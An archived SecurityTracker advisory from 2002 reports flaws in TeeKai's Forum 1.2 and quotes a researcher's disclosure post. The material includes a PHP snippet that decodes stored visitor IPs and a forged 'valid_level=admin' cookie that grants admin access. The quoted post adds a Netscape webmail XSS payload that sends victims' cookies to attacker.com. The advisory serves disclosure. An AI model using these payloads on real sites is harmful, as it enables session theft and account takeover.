SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   TeeKai's Forum Vendors:   Teekai
TeeKai's Forum Software Discloses Visitor IP Addresses to Remote Users and Allows Remote Authenticated Users to Gain Administrative Privileges
SecurityTracker Alert ID:  1004444
SecurityTracker URL:  http://securitytracker.com/id/1004444
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 4 2002
Impact:   Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.2
Description:   Several vulnerabilities were reported in TeeKai's Forum web bulletin board software. A remote user can determine the IP addresses of recent visitors to the affected web site and can gain administrative access to the application.

It is reported that TeeKai's Forum discloses the IP addresses of the web site visitors to remote users. The software stores the IP addresses of all visitors in a file (/data/member_log.txt) that can be accessed via the userlog.php script. The IP addresses are encoded using a weak encoding algorithm and can be readily decoded. Some example code to perform the decoding is provided:

<?
$cryptedip = explode('.',$cryptedip);
$key = md5("20");
$trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/$key.".".$cryptedip[3]/$key;
echo "Result : $trueip";
?>

According to the report, TeeKai's Forum allows a remote user to specify a certain cookie to gain administrative access to the forum. A remote user can set the "valid_level" cookie to "admin" instead of "user". The Forum apparently trusts the value of this cookie and no other authentication is performed.

Impact:   A remote user can gain administrative access to the Forum.

A remote user can determine the IP addresses of recent visitor's to the web site.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.teekai.info/basic/homepage.php?page=freestuffs&choose=webprogramming&cat=php&item=forum (Links to External Site)
Cause:   Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Security holes in two Teekai's products + security hole in




Hi :)

Products :
**********
Tracking Online 1.0
Teekai's forum full 1.2
http://www.teekai.info

Problems :
**********
Tracking Online & Teekai's forum :
- Informations recovery
- Informations decoding
Teekai's forum :
- Admin access
- small holes
Tracking Online :
-XSS

Exploits :
**********
Forum & Tracking :
- Php file to decode informations :
<?
$cryptedip = explode('.',$cryptedip);
$key = md5("20");
$trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/
$key.".".$cryptedip[3]/$key;
echo "Result : $trueip";
?>

Forum :
- /data/member_log.txt
- Setcookie "valid_level=admin"
- Setcookie "valid_username_online=[VALUE e.g. JScript ]"
- ...

Tracking Online :
- /data/userlog/log.txt
- /userlog.php
- ...

More details in french :
http://www.ifrance.com/kitetoua/tuto/Teekai.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%
2Fkitetoua%2Ftuto%2FTeekai.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII




There is a security hole in the mail service that Netscape proposes ( 
http://ncmail.netscape.com ).
It's making it possible to inject HTML in an e-mail... and this service 
authenticates by the cookies.

The hole consists in sending a mail with for subject a jscript preceded 
by : ";</script*> .

The idea would be a script of this kind on subject :
";</script*><form name=a*><input name=o 
value=http://www.attacker.com/script?*></form*>&lt;script*>window.open
(document.a.o.value+document.cookie)</script*>

without '*'.
I use <form> because " and ' are replaced by \" or \'.

Vendors were informs but did not repair.

Maybe more details soon...

Sorry for my poor english.

frog-m@n 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC